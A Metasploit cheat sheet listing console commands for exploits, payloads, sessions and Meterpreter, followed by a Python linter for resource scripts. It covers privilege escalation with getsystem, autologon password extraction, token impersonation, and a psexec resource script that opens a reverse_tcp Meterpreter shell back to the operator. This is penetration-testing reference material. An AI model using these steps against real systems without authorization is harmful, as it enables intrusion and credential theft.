d4Rk's 1337 h4x0r guide

Metasploit Framework (MSF)

Metasploit: the world's most used penetration testing framework.

Start

Start db

msfdb start

or

systemctl start postgresql

Start metasploit framework console

msfconsole

Exploits

Select exploit

use <exploit>

Run exploit

run

or

exploit

Options

Show options

show options

Show advanced options

show advanced

Set option

set <option> <value>

Set option (global)

setg <option> <value>

Payloads

Show payloads

show payloads

Select payload

set payload <payload>

Sessions

Show sessions (list active sessions)

sessions -l

Interact with session

sessions <number>

Send session to background

background

Meterpreter

The shell command will present you with a standard shell on the target system.

shell

Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.

getsystem

Encoders

Show encoders

show encoders

Select encoder

set encoder <encoder>

Misc

Search for exploits

search <term>

Go back

back

Display help

help

Show info about the currently selected module

info

List auxiliary modules

show auxiliary

Multi/handler

Start a listener only (no exploit module), e.g. to catch a reverse shell from a standalone payload

use exploit/multi/handler

Jobs

Start job in background

run -j

Show jobs

jobs

Post exploitation

This module suggests local exploits that may apply to the current Meterpreter session.

use post/multi/recon/local_exploit_suggester

This module extracts the plain-text Windows user login password stored in the Registry (AutoLogon).

use post/windows/gather/credentials/windows_autologin

This module logs in with the specified username/password and executes the supplied command as a hidden process.

use post/windows/manage/run_as

Meterpreter session

Upgrade a plain shell session to a Meterpreter session

use post/multi/manage/shell_to_meterpreter

Migrate to another (e.g. more stable) process

migrate <pid>

Get system info

sysinfo

Port forwarding (expose a port bound to localhost on the target on a local port)

portfwd add -l <local-port> -r 127.0.0.1 -p <remote-port>

Impersonation (Windows)

Look for privileges like SeImpersonatePrivilege, SeDebugPrivilege, etc.

whoami /priv

Load incognito module and list available tokens

load incognito
list_tokens -g

Impersonate e.g. BUILTIN\Administrators

impersonate_token "BUILTIN\Administrators"

Impersonating a token does not by itself give the current process those rights (token != permission); migrate into a process that already runs with the desired permissions to actually use them.

ps
migrate <pid>

Resource Scripts

Resource scripts (.rc files) provide an easy way to automate repetitive tasks in Metasploit: one console command per line, executed in order when the script is loaded.

msfconsole -r demo.rc

demo.rc

use exploit/windows/smb/psexec
set rhost <ip>
set smbuser Administrator
set smbpass <hash-or-password>
set smbdomain <domain>
set payload windows/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/smart_migrate
setg lport 443
setg lhost <own-ip>
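A resource script is run exactly as written, so an unfilled placeholder such as <ip> or an option set before any module is selected only fails once msfconsole reaches that line. The following linter is an added example (not part of this guide and not a Metasploit API): it parses the line-oriented .rc format shown above and reports those mistakes before the script is handed to msfconsole -r. The RcLintResult class, the lint_rc and unfilled_placeholders helpers and the DEMO_RC sample (a copy of the demo.rc above, used as constructed input) are this example's own.

```python
"""Lint a Metasploit resource script (.rc) before running it with msfconsole -r.

Added example, not code from the original guide or from Metasploit. It reads
the same format demo.rc uses (one console command per line, '#' comments,
optional <ruby>...</ruby> blocks) and reports problems a user would otherwise
discover only at runtime.
"""
import re
from dataclasses import dataclass, field

# Template values that were never filled in, e.g. <ip>, <own-ip>.
PLACEHOLDER = re.compile(r"<[^<>\s]+>")

# Constructed sample input: the demo.rc from the page, verbatim.
DEMO_RC = """use exploit/windows/smb/psexec
set rhost <ip>
set smbuser Administrator
set smbpass <hash-or-password>
set smbdomain <domain>
set payload windows/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/smart_migrate
setg lport 443
setg lhost <own-ip>
"""


@dataclass
class RcLintResult:
    commands: list = field(default_factory=list)  # (lineno, verb, args)
    problems: list = field(default_factory=list)  # human-readable findings


def parse_rc(text: str) -> list:
    """Split an .rc file into (lineno, verb, argument-string) tuples.

    Lines inside <ruby>...</ruby> are Ruby code, not console commands, and are
    skipped; blank lines and '#' comments are ignored.
    """
    commands = []
    in_ruby = False
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.lower() == "<ruby>":
            in_ruby = True
            continue
        if line.lower() == "</ruby>":
            in_ruby = False
            continue
        if in_ruby:
            continue
        verb, _, args = line.partition(" ")
        commands.append((lineno, verb.lower(), args.strip()))
    return commands


def unfilled_placeholders(text: str) -> set:
    """Return every <placeholder> still present on set/setg lines."""
    found = set()
    for _, verb, args in parse_rc(text):
        if verb in ("set", "setg"):
            found.update(PLACEHOLDER.findall(args))
    return found


def lint_rc(text: str) -> RcLintResult:
    """Check ordering and completeness of the commands in an .rc file."""
    result = RcLintResult(commands=parse_rc(text))
    module = None          # module selected by the last 'use'
    payload_set = False    # whether 'set payload' was seen for that module
    for lineno, verb, args in result.commands:
        if verb in ("set", "setg") and PLACEHOLDER.search(args):
            result.problems.append(
                f"line {lineno}: unfilled placeholder in '{verb} {args}'")
        if verb == "use":
            module = args
            payload_set = False
        elif verb == "set":
            # 'set' is module-scoped; 'setg' is global and may appear anywhere.
            if module is None:
                result.problems.append(
                    f"line {lineno}: 'set {args}' before any 'use <module>'")
            if args.lower().startswith("payload "):
                payload_set = True
        elif verb in ("run", "exploit"):
            if module is None:
                result.problems.append(
                    f"line {lineno}: '{verb}' with no module selected")
            elif module.startswith("exploit/") and not payload_set:
                # Not an error: msfconsole falls back to the module's default payload.
                result.problems.append(
                    f"line {lineno}: '{verb}' on {module} without an explicit 'set payload' (default payload will be used)")
    return result


if __name__ == "__main__":
    report = lint_rc(DEMO_RC)
    print(f"{len(report.commands)} commands, {len(report.problems)} findings")
    for problem in report.problems:
        print(" -", problem)
```

Run it against a real script with `lint_rc(open("demo.rc").read())`; an empty `problems` list means every placeholder was replaced and every `set` follows a `use`, which is the state the script should be in before `msfconsole -r` is invoked.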

Last updated 3 years ago